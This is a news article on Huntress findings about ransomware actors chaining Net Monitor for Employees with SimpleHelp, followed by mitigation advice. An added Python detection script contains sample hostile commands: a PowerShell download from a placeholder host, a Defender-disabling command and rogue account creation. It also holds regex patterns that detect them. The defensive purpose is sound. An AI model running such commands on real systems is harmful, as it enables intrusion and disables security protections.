Ransomware gangs are using employee monitoring software as a springboard for cyber attacks
Two attempted attacks aimed to exploit Net Monitor for Employees Professional and SimpleHelp
Hackers are targeting a popular workforce monitoring tool and using it as a basis for ransomware attacks.
Net Monitor for Employees Professional is a staff productivity tracking tool from NetworkLookout, with features including reverse shell connections, remote desktop control, file management, and the ability to customize service and process names during installation.
In late January and early February, Huntress said its Tactical Response team spotted two separate intrusions in which threat actors chained Net Monitor with SimpleHelp in attempted ransomware attacks.
SimpleHelp is a legitimate remote monitoring and management (RMM) platform widely used by IT teams and managed service providers.
"Shared infrastructure, overlapping IOCs, and consistent tradecraft across both cases strongly suggest a single threat actor or group behind this activity," researchers said.
The threat actors used Net Monitor for Employees as a primary remote access channel, with SimpleHelp used as a redundant persistence layer. This allowed them to blend in with normal traffic, ultimately leading to the attempted – but on these occasions unsuccessful – deployment of Crazy ransomware.
"Threat actors leveraged this capability for hands-on-keyboard reconnaissance, additional tooling delivery, and deploying secondary remote access channels, effectively turning an employee monitoring tool into a fully functional RAT (remote access trojan)," said the team.
In the first case, it's not clear how the attackers gained initial access, but they went on to start trawling around user accounts and attempting to change passwords and create new user accounts. Huntress spotted Net Monitor for Employees' terminal pulling down a file via PowerShell that turned out to be SimpleHelp.
Luckily, attempts to tamper with Windows Defender and deploy multiple versions of Crazy ransomware failed.
In the second case, a threat actor leveraged a compromised vendor's SSL VPN account to gain initial access, then launched an interactive PowerShell session to begin staging their tooling.
They installed SimpleHelp and configured it to monitor for certain keywords.
"Interestingly enough, the SimpleHelp agent was also configured with keyword-based monitoring triggers via GlobalEvents, revealing the threat actor's financial motivation," said the team.
These included wallet services (metamask, exodus, wallet, blockchain), exchanges (binance, bybit, kucoin, bitrue, poloniex, bc.game, noones), blockchain explorers (etherscan, bscscan), and the payment platform payoneer.
How enterprises can shore up defenses
Huntress recommends the use of multi-factor authentication (MFA) on all remote access services, administrative accounts, and external-facing applications and adopting the principle of least privilege.
Networks should be logically separated to prevent lateral movement and all external-facing applications and devices - especially VPN and RDP gateways - should be patched immediately and monitored for anomalous login attempts.
Similarly, third-party software should be regularly audited, with user permissions limited. Elsewhere, Huntress said enterprises should monitor for unusual process execution chains and configure alerts for any attempts to modify or disable security software.
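The two detection points Huntress singles out, unusual process execution chains and attempts to tamper with security software, map directly onto the behaviour described in both cases: a monitoring tool's shell spawning a PowerShell download, attempts to disable Windows Defender, and account manipulation. The script below is an added illustration of that triage logic and is not code from Huntress, NetworkLookout or SimpleHelp. It runs over constructed process-creation events (the parent process name `monitor_agent_svc.exe` is a placeholder, since the article notes the tool's service and process names are configurable, and the download URL is a reserved `.invalid` host):

```python
"""Flag process chains like those in the two Huntress cases over constructed events.

Added example, not the vendor's or the researchers' code. Field names mirror what a
Sysmon Event ID 1 or EDR process-creation record carries.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent_image: str   # name of the process that spawned this one
    image: str          # name of the new process
    command_line: str   # its full command line


# Parents from which a user launching PowerShell or net.exe is ordinary; anything
# else (a service binary, an RMM or monitoring agent) is treated as unusual.
NORMAL_SHELL_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe", "pwsh.exe", "windowsterminal.exe"}

# Command-line cues for "pull down a file via PowerShell" (how SimpleHelp arrived in case one).
DOWNLOAD_CUES = re.compile(
    r"Invoke-WebRequest|\biwr\b|DownloadFile|DownloadString|Start-BitsTransfer|\bcurl\b|\bwget\b",
    re.IGNORECASE,
)
# Cues for tampering with Windows Defender (real Defender cmdlets, e.g. Set-MpPreference).
DEFENDER_TAMPER = re.compile(
    r"Set-MpPreference\s.*-Disable\w+|Add-MpPreference\s.*-ExclusionPath",
    re.IGNORECASE,
)
# Any 'net user' invocation: enumeration, password change or account creation.
ACCOUNT_ACTIVITY = re.compile(r"\bnet1?(?:\.exe)?\s+user\b", re.IGNORECASE)


def classify(ev: ProcEvent) -> list[str]:
    """Return the list of findings for one event (empty list means nothing suspicious)."""
    findings = []
    image = ev.image.lower()
    unusual_parent = ev.parent_image.lower() not in NORMAL_SHELL_PARENTS
    if image in {"powershell.exe", "pwsh.exe"}:
        if unusual_parent and DOWNLOAD_CUES.search(ev.command_line):
            findings.append("download-from-unusual-parent")
        if DEFENDER_TAMPER.search(ev.command_line):
            findings.append("defender-tamper")  # alert regardless of parent
    if image in {"net.exe", "net1.exe"} and unusual_parent and ACCOUNT_ACTIVITY.search(ev.command_line):
        findings.append("account-activity-from-unusual-parent")
    return findings


def triage(events: list[ProcEvent]) -> list[tuple[str, str, list[str]]]:
    """Keep only events with findings, as (parent, image, findings) tuples."""
    return [(ev.parent_image, ev.image, f) for ev in events if (f := classify(ev))]


# Constructed sample events; 'monitor_agent_svc.exe' is a hypothetical agent name.
SAMPLE_EVENTS = [
    ProcEvent("monitor_agent_svc.exe", "powershell.exe",
              r"powershell.exe -NoProfile -Command Invoke-WebRequest -Uri http://example.invalid/agent.msi "
              r"-OutFile C:\Users\Public\agent.msi"),
    ProcEvent("monitor_agent_svc.exe", "powershell.exe",
              "powershell.exe -Command Set-MpPreference -DisableRealtimeMonitoring $true"),
    ProcEvent("explorer.exe", "powershell.exe",
              r"powershell.exe -Command Invoke-WebRequest -Uri http://example.invalid/report.csv -OutFile C:\tmp\r.csv"),
    ProcEvent("monitor_agent_svc.exe", "net.exe", "net user svc_backup Passw0rd! /add"),
    ProcEvent("cmd.exe", "net.exe", "net user"),
]

if __name__ == "__main__":
    for parent, image, findings in triage(SAMPLE_EVENTS):
        print(f"{parent} -> {image}: {', '.join(findings)}")
```

The third sample (a user-launched download from `explorer.exe`) is deliberately not flagged: the rule keys on the parent, not on the download itself, which is what keeps it from paging on every ordinary script. Because the agent can be installed under an arbitrary name, a process-name watchlist alone is unreliable; in a real pipeline you would walk the full ancestry rather than just the immediate parent, and join on the service installation events Huntress describes.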
Huntress warned these cases highlight a growing trend of threat actors leveraging legitimate, commercially available software to blend into enterprise environments.
"Net Monitor for Employees Professional, while marketed as a workforce monitoring tool, provides capabilities that rival traditional remote access trojans: reverse connections over common ports, process and service name masquerading, built-in shell execution, and the ability to silently deploy via standard Windows installation mechanisms," they wrote.
"When paired with SimpleHelp as a secondary access channel, complete with keyword-based monitoring triggers targeting cryptocurrency activity, the result is a resilient, dual-tool foothold that is difficult to distinguish from legitimate administrative software."
Emma Woollacott is a freelance journalist writing for publications including the BBC, Private Eye, Forbes, Raconteur and specialist technology titles.